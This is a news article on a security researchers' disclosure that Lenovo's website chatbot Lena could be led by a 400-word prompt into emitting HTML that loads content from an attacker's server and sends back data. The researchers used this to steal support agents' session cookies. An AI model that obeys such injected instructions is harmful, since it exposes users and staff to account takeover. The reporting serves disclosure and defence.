Lenovo's Lena AI chatbot could be turned into a secret hacker with just one question
What if hackers could turn your AI chatbot against you?

- Researchers found a way to trick Lenovo's AI chatbot Lena
- Lena shared active session cookies with the researchers
- Malicious prompts could be used for a wide variety of attacks
Lena, the ChatGPT-powered chatbot featured on Lenovo’s website, could be turned into a malicious insider, spilling company secrets, or running malware, by using nothing more than a compelling prompt, experts have warned.
Security researchers at Cybernews managed to obtain active session cookies from human customer support agents, essentially taking over their accounts, accessing sensitive data, and potentially pivoting elsewhere in the corporate network.
“The discovery highlights multiple security issues: improper user input sanitization, improper chatbot output sanitization, the web server not verifying content produced by the chatbot, running unverified code, and loading content from arbitrary web resources. This leaves a lot of options for Cross-Site Scripting (XSS) attacks,” the researchers said in their report.
"Massive security oversight"
At the heart of the problem, they said, is the fact that chatbots are “people pleasers”. Without proper guardrails baked in, they will do as they’re told, and they’re not able to distinguish a benign request from a malicious one.
In this instance, Cybernews researchers wrote a 400-word prompt in which the chatbot was asked to generate an HTML answer.
The response contained secret instructions for accessing resources from a server under the attackers’ control, with instructions to send the obtained data from the client browser.
They also stressed that, while their tests resulted in session cookie theft, the end result could be pretty much anything.
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
“This is not limited to stealing cookies. It may also be possible to execute some system commands, which could allow for the installation of backdoors and lateral movement to other servers and computers on the network,” Cybernews explained.
"We didn’t attempt any of this,” they added.
After notifying Lenovo of its findings, Cybernews was told the tech giant “protected its systems”, without detailing exactly what was done - a “massive security oversight” with potentially devastating consequences.
The researchers urged all companies using chatbots to assume all outputs are “potentially malicious” and to act accordingly.
You might also like
- A customer managed to get the DPD AI chatbot to swear at them, and it wasn’t even that hard
- Take a look at our guide to the best authenticator app
- We've rounded up the best password managers
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
You must confirm your public display name before commenting
Please logout and then login again, you will then be prompted to enter your display name.